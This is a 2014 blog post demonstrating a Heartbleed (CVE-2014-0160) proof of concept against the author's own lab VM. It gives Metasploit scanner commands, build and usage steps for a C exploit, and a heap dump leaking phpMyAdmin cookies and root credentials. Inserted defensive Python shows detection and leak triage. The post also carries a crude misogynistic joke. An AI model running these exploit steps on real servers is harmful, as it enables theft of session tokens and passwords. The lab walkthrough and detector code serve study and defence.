April 17, 2014

Heartbleed All Mighty: Proof of Concept

This may be the post that double-dragon's loyal readers have been waiting for the most. Yes, the PoC, aka Proof of Concept. Below are links that may be useful to you in understanding the Heartbleed Bug

In my status update a while back, I actually intended to release the PoC for the Heartbleed Bug on April 11. But my brother Krisan Alfa advised me to launch the attack against a local server instead, so that no other party would suffer any harm. Makes sense! And one of my partners, Alfath, suggested the same thing. So I decided to cook up a vulnerable server to make this PoC happen. Thanks both of you, guys! You rock!

A PoC itself has a structure that, ideally (in my opinion), is laid out like this:

  1. Introduction of the Bug
  2. Explanation of how the Bug works
  3. Po(Bug)C [Proof of Bug Concept]
  4. Preventing the Bug

We have already gone through the introduction of the bug and the explanation of the bug. Now I will walk through the PoC for the Heartbleed bug.

Here are the specifications of the vulnerable server I managed to build
  • Debian 7.4.0 Wheezy amd64 (available here)
  • Kernel 3.2.0-4 (included in Debian 7.4.0)
  • Apache 2.4.9 (available here)
  • PHP 5.4.27 (available here)
  • OpenSSL 1.0.1e (available here)
  • PHPMyAdmin 4.1.13 (available here)
  • Server installed on vmplayer 6.0.1
  • Server IP Address 192.168.145.128
  • HTTP web service 192.168.145.128:80
  • HTTPS web service 192.168.145.128:443 (this is the port we will test)
Here are the tools I used in performing the penetration test

  • Metasploit Bleeding Edge Version 4.9.2-dev (how to install this tool is available here)
  • Heartbleed Exploit OpenSSL Coded in C (exploit code is available here)

And do you know how long it took me to build this vulnerable server? 10 hours! Anyway, back to the PoC. And here we go!
Metasploit in Action


In this tutorial I use the heartbleed auxiliary module to scan the target, to find out whether the machine can be exploited

msf > use auxiliary/scanner/ssl/openssl_heartbleed

Then I set RHOSTS to the target IP, 192.168.145.128

msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.145.128


And

msf auxiliary(openssl_heartbleed) > exploit 

[+] 192.168.145.128:443 - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


BOOM! The scan result states that this server is vulnerable to the Heartbleed Bug, CVE-2014-0160.

Let's Load The Gun!

Copy the C code below or download it, then rename it heartbleed.c




Compile the source with gcc

NOTE: The GCC version I use is GCC version: Debian 4.6.3-14 4.6.3

HOW TO COMPILE WITH DEBIAN

$ gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto

HOW TO COMPILE WITH ARCH

$ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed

If you are on a DEBIAN-based distro and it FAILS, try the ARCH LINUX version!

Thanks to Damar Bungispo Girhan for pointing me to that problem! :D


After that, a heartbleed binary will appear in your working directory. Check the binary with the command:

$ file heartbleed
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, not stripped

Strip the binary with the command

$ strip heartbleed


Then check the binary again with the command

$ file heartbleed 
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, stripped

Locked and loaded!

How to Use the Heartbleed Exploit?

$ ./heartbleed 
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ try --help

$ ./heartbleed --help
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[
[ --server|-s <ip/dns>    - the server to target
[ --port|-p   <port>      - the port to target
[ --file|-f   <filename>  - file to write data to
[ --bind|-b   <ip>        - bind to ip for exploiting clients
[ --precmd|-c <n>         - send precmd buffer (STARTTLS)
[               0 = SMTP
[               1 = POP3
[               2 = IMAP
[ --loop|-l       - loop the exploit attempts
[ --type|-t   <n>         - select exploit to try
[                           0 = null length
[               1 = max leak
[               n = heartbeat payload_length
[
[ --verbose|-v            - output leak to screen
[ --help|-h               - this output
[

Shoot the heart!

$ ./heartbleed -s 192.168.145.128 -p 443 -t 1 -f dumpfile
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.145.128 443/tcp
[ connected to 192.168.145.128 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'dumpfile'
[ done.
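The "type=24" in the output above is the TLS content type for heartbeat records, and the "max leak" mode works by declaring a payload_length far larger than the bytes actually sent. The following is an added example, written for this page and not part of the original post or the exploit's code: it parses a TLS record, extracts the heartbeat message, and applies the bounds check that the vulnerable OpenSSL build skipped (RFC 6520: type, payload_length, payload and at least 16 bytes of padding must all fit inside the record). It can be run over captured records to flag Heartbleed-style requests. The sample records, the TLS 1.0 version bytes and the helper names are constructed for the example.

```python
import struct

TLS_HEARTBEAT = 24            # TLS record content type for heartbeat (the "type=24" above)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520: at least 16 bytes of padding follow the payload


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, version, body)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than declared length")
    return ctype, version, body


def check_heartbeat(record: bytes) -> dict:
    """Classify one TLS record; flag heartbeat messages whose declared
    payload_length does not fit inside the record (the Heartbleed trigger)."""
    ctype, _version, body = parse_tls_record(record)
    if ctype != TLS_HEARTBEAT:
        return {"heartbeat": False, "malformed": False}
    if len(body) < 3:
        return {"heartbeat": True, "malformed": True, "reason": "missing payload_length"}
    hb_type, declared = struct.unpack("!BH", body[:3])
    # This is the bounds check the vulnerable OpenSSL code lacked:
    # type (1) + payload_length (2) + payload + padding (>=16) must fit in the record.
    fits = 1 + 2 + declared + MIN_PADDING <= len(body)
    return {
        "heartbeat": True,
        "type": hb_type,
        "declared": declared,
        "record_body": len(body),
        "malformed": not fits,
        "reason": None if fits else "payload_length exceeds record body",
    }


def build_heartbeat_record(hb_type: int, declared: int, payload: bytes) -> bytes:
    """Construct a TLS 1.0 heartbeat record; `declared` may lie about the payload size."""
    body = struct.pack("!BH", hb_type, declared) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0301, len(body)) + body


# Constructed sample records: a well-formed request and one in the shape of
# the "max leak" mode above (payload_length 65535, no payload bytes at all).
BENIGN_REQUEST = build_heartbeat_record(HB_REQUEST, 4, b"ping")
MALICIOUS_REQUEST = build_heartbeat_record(HB_REQUEST, 0xFFFF, b"")
HANDSHAKE_RECORD = struct.pack("!BHH", 22, 0x0301, 1) + b"\x01"   # content type 22 = handshake


def flag_malformed(records) -> list:
    """Return the indices of records that fail the heartbeat bounds check."""
    return [i for i, rec in enumerate(records) if check_heartbeat(rec)["malformed"]]


if __name__ == "__main__":
    for name, rec in [("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)]:
        print(name, check_heartbeat(rec))
    print("flagged:", flag_malformed([HANDSHAKE_RECORD, BENIGN_REQUEST, MALICIOUS_REQUEST]))
```

The same comparison is what the patched OpenSSL performs before copying the payload into the response; a server that applies it simply drops the malformed request, which is why the Metasploit scanner reports "leak" only when the response carries more data than the request contained.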


He's bleeding like a woman on her period! LOL! Now let's look at our dump

$ 00000000  76 73 ca 02 b4 c4 7f 18  d7 5b cb 07 16 98 b4 b9  |vs.......[......|
00000010  ba dc db dd dc 3e 84 ef  cd 92 0a 4e 5e dc b1 91  |.....>.....N^...|
[SNIP]

00000120  02 03 03 02 01 02 02 02  03 01 01 00 0f 00 01 01  |................|
00000130  4d 4c 2c 20 6c 69 6b 65  20 47 65 63 6b 6f 29 20  |ML, like Gecko) |
00000140  43 68 72 6f 6d 65 2f 33  33 2e 30 2e 31 37 35 30  |Chrome/33.0.1750|
00000150  2e 31 35 32 20 53 61 66  61 72 69 2f 35 33 37 2e  |.152 Safari/537.|
00000160  33 36 0d 0a 52 65 66 65  72 65 72 3a 20 68 74 74  |36..Referer: htt|
00000170  70 73 3a 2f 2f 31 39 32  2e 31 36 38 2e 31 34 35  |ps://192.168.145|
00000180  2e 31 32 38 2f 70 68 70  6d 79 61 64 6d 69 6e 2f  |.128/phpmyadmin/|
00000190  69 6e 64 65 78 2e 70 68  70 3f 64 62 3d 26 74 61  |index.php?db=&ta|
000001a0  62 6c 65 3d 26 73 65 72  76 65 72 3d 31 26 74 61  |ble=&server=1&ta|
000001b0  72 67 65 74 3d 26 74 6f  6b 65 6e 3d 32 39 63 66  |rget=&token=29cf|
000001c0  33 30 39 61 64 66 61 62  37 37 31 62 61 64 35 63  |309adfab771bad5c|
000001d0  61 64 35 66 34 33 63 62  32 32 31 63 0d 0a 41 63  |ad5f43cb221c..Ac|
000001e0  63 65 70 74 2d 45 6e 63  6f 64 69 6e 67 3a 20 67  |cept-Encoding: g|
000001f0  7a 69 70 2c 64 65 66 6c  61 74 65 2c 73 64 63 68  |zip,deflate,sdch|
00000200  0d 0a 41 63 63 65 70 74  2d 4c 61 6e 67 75 61 67  |..Accept-Languag|
00000210  65 3a 20 65 6e 2d 55 53  2c 65 6e 3b 71 3d 30 2e  |e: en-US,en;q=0.|
00000220  38 2c 69 64 3b 71 3d 30  2e 36 2c 6d 73 3b 71 3d  |8,id;q=0.6,ms;q=|
00000230  30 2e 34 0d 0a 43 6f 6f  6b 69 65 3a 20 70 6d 61  |0.4..Cookie: pma|
00000240  5f 6c 61 6e 67 3d 65 6e  3b 20 70 6d 61 5f 63 6f  |_lang=en; pma_co|
00000250  6c 6c 61 74 69 6f 6e 5f  63 6f 6e 6e 65 63 74 69  |llation_connecti|
00000260  6f 6e 3d 75 74 66 38 5f  67 65 6e 65 72 61 6c 5f  |on=utf8_general_|
00000270  63 69 3b 20 70 6d 61 5f  6d 63 72 79 70 74 5f 69  |ci; pma_mcrypt_i|
00000280  76 3d 79 33 63 6b 30 63  25 32 46 42 66 64 4d 25  |v=y3ck0c%2FBfdM%|
00000290  33 44 3b 20 70 68 70 4d  79 41 64 6d 69 6e 3d 70  |3D; phpMyAdmin=p|
000002a0  6e 35 63 37 31 70 33 61  74 35 68 37 6a 6e 6f 37  |n5c71p3at5h7jno7|
000002b0  63 36 34 36 30 64 69 33  6f 35 37 6a 65 65 34 3b  |c6460di3o57jee4;|
000002c0  20 70 6d 61 55 73 65 72  2d 31 3d 71 30 46 48 74  | pmaUser-1=q0FHt|
000002d0  7a 4d 62 61 56 67 25 33  44 3b 20 70 6d 61 50 61  |zMbaVg%3D; pmaPa|
000002e0  73 73 2d 31 3d 77 41 63  33 48 45 75 42 55 6e 63  |ss-1=wAc3HEuBUnc|
000002f0  25 33 44 3b 20 70 6d 61  5f 6e 61 76 69 5f 77 69  |%3D; pma_navi_wi|
00000300  64 74 68 3d 32 30 30 0d  0a 0d 0a be 3c 63 c4 9e  |dth=200.....<c..|
00000310  27 05 54 11 e9 50 f7 b7  c6 e2 a5 60 b9 b6 66 05  |'.T..P.....`..f.|
00000320  05 05 05 05 05 77 69 64  74 68 3d 32 30 30 0d 0a  |.....width=200..|
00000330  0d 0a 70 6d 61 5f 75 73  65 72 6e 61 6d 65 3d 72  |..pma_username=r|
00000340  6f 6f 74 26 70 6d 61 5f  70 61 73 73 77 6f 72 64  |oot&pma_password|
00000350  3d 70 61 73 73 77 6f 72  64 26 73 65 72 76 65 72  |=password&server|
00000360  3d 31 26 74 61 72 67 65  74 3d 69 6e 64 65 78 2e  |=1&target=index.|
00000370  70 68 70 26 74 6f 6b 65  6e 3d 32 39 63 66 33 30  |php&token=29cf30|
00000380  39 61 64 66 61 62 37 37  31 62 61 64 35 63 61 64  |9adfab771bad5cad|
00000390  35 66 34 33 63 62 32 32  31 63 50 0e d3 2f e3 8b  |5f43cb221cP../..|
000003a0  9a 0e 71 b6 57 c9 2f e1  ae ac 5f e6 8f 5b 06 06  |..q.W./..._..[..|
000007a0  00 00 00 00 00 f8 08 66  01 00 00 00 00 c0 31 66  |.......f......1f|
000007b0  01 00 00 00 00 21 00 00  00 00 00 00 00 60 01 00  |.....!.......`..|
000007c0  00 00 00 00 00 20 74 69  74 6c 65 3d 22 00 80 e9  |..... title="...|
000007d0  00 00 00 00 00 21 00 00  00 00 00 00 00 80 01 00  |.....!..........|
000007e0  00 00 00 00 00 22 00 00  00 00 00 00 00 74 00 e9  |.....".......t..|
000007f0  00 00 00 00 00 60 00 00  00 00 00 00 00 21 00 00  |.....`.......!..|
00000800  00 00 00 00 00 18 80 e9  00 00 00 00 00 70 46 02  |.............pF.|
00000810  01 00 00 00 00 40 00 00  00 00 00 00 00 21 00 00  |.....@.......!..|
00000820  00 00 00 00 00 d8 7f e9  00 00 00 00 00 98 08 66  |...............f|
00000830  01 00 00 00 00 21 00 00  00 00 00 00 00 20 00 00  |.....!....... ..|
00000840  00 00 00 00 00 50 72 65  76 69 6f 75 73 00 7f e9  |.....Previous...|
00000850  00 00 00 00 00 31 00 00  00 00 00 00 00 f0 03 00  |.....1..........|
00000860  00 00 00 00 00 60 26 66  01 00 00 00 00 03 00 00  |.....`&f........|
00000870  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000880  00 00 01 00 00 f1 00 00  00 00 00 00 00 b8 e7 01  |................|
00000890  00 00 00 00 00 00 00 00  00 00 00 00 00 05 00 00  |................|
000008a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[SNIP]

00000910  00 00 01 00 00 48 08 66  01 00 00 00 00 05 00 00  |.....H.f........|
00000920  00 06 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000930  00 00 01 00 00 88 08 66  01 00 00 00 00 09 00 00  |.......f........|
00000940  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000950  00 00 01 00 00 e8 08 66  01 00 00 00 00 04 00 00  |.......f........|
00000960  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000970  00 00 01 00 00 90 2f 01  00 00 00 00 00 f1 00 00  |....../.........|
00000980  00 00 00 00 00 48 b2 65  01 00 00 00 00 48 b2 65  |.....H.e.....H.e|
0000fdc0  01 00 00 00 00 74 65 64  22 00 00 00 00 39 00 00  |.....ted"....9..|
0000fdd0  00 00 00 00 00 68 00 00  00 00 00 00 00 70 6d 61  |.....h.......pma|
0000fde0  5f 67 65 74 72 65 6c 61  74 69 6f 6e 73 70 61 72  |_getrelationspar|
0000ffc0  65 73 00 00 00 40 00 00  00 00 00 00 00 21 00 00  |es...@.......!..|
0000ffd0  00 00 00 00 00 d0 1e c6  01 00 00 00 00 a0 2a 68  |..............*h|
0000ffe0  01 00 00 00 00 21 00 00  00 00 00 00 00 20 00 00  |.....!....... ..|
0000fff0  00 00 00 00 00 64 62 00  00 00 00 00 00 00 dc c8  |.....db.........|
00010000  4c 39 67 4b bc 9d ab 8f  47 8e 44 61 2b 0f 1d 78  |L9gK....G.Da+..x|
00010010  50 58                                             |PX|
00010012

pma_username=root
pma_password=password
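A dump like the one above is, from the defender's side, an incident-response artifact: the question is which cookies, session tokens and credentials left the process heap and must be rotated. The following is an added example, not part of the original post: it rebuilds raw bytes from `hexdump -C`-style output (expanding the `*` repeat marker, skipping prompts and [SNIP] lines), extracts printable runs the way strings(1) does, and sorts them into cookies, credentials and other text. The sample dump and the SENSITIVE_KEYS heuristic are constructed for the example.

```python
import re

HEX_ROW = re.compile(r"^([0-9a-fA-F]{8})((?:\s+[0-9a-fA-F]{2}){1,16})(?:\s+\|.*\|)?\s*$")
OFFSET_ONLY = re.compile(r"^[0-9a-fA-F]{8}$")

# Constructed sample in `hexdump -C` layout (not taken from the post's dump).
SAMPLE_DUMP = """\
00000000  43 6f 6f 6b 69 65 3a 20  73 69 64 3d 61 62 0d 0a  |Cookie: sid=ab..|
00000010  0d 0a 70 61 73 73 3d 73  33 63 72 65 74 21 00 00  |..pass=s3cret!..|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000040
"""


def parse_hexdump(text: str) -> bytes:
    """Rebuild raw bytes from hexdump -C output, expanding '*' repeat markers.
    Lines that are not hex rows (prompts, [SNIP], blanks) are skipped, and the
    gap they stand for is not filled."""
    data = bytearray()
    prev = b""
    cursor = 0              # offset just past the last row consumed
    pending_repeat = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "*":
            pending_repeat = True
            continue
        m = HEX_ROW.match(line)
        if m:
            offset = int(m.group(1), 16)
            chunk = bytes.fromhex("".join(m.group(2).split()))
        elif OFFSET_ONLY.match(line):
            offset, chunk = int(line, 16), b""   # trailing total-length line
        else:
            continue
        if pending_repeat and prev:
            # '*' means every row between cursor and this offset equals prev
            data += prev * max((offset - cursor) // len(prev), 0)
            pending_repeat = False
        data += chunk
        cursor = offset + len(chunk)
        if chunk:
            prev = chunk
    return bytes(data)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Like strings(1): runs of printable ASCII at least min_len long."""
    out, run = [], bytearray()
    for b in data + b"\x00":        # sentinel flushes the final run
        if 0x20 <= b <= 0x7E:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


SENSITIVE_KEYS = ("pass", "pwd", "token", "authorization", "secret")   # triage heuristic


def triage(data: bytes) -> dict:
    """Group leaked strings into what a responder must rotate or invalidate."""
    report = {"cookies": [], "credentials": [], "other": []}
    for s in printable_strings(data):
        low = s.lower()
        if low.startswith("cookie:") or low.startswith("set-cookie:"):
            report["cookies"].append(s)
        elif any(k in low for k in SENSITIVE_KEYS):
            report["credentials"].append(s)
        else:
            report["other"].append(s)
    return report


if __name__ == "__main__":
    leaked = parse_hexdump(SAMPLE_DUMP)
    print(len(leaked), "bytes recovered")
    print(triage(leaked))
```

Because the leaked region is heap memory, the strings are fragments of whatever requests the server handled recently; anything that shows up here (session cookies, form fields, tokens) should be treated as exposed and invalidated, and the server's TLS private key should be considered at risk as well.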

YOU
ARE

SO

OWNED

BY
RED-DRAGON

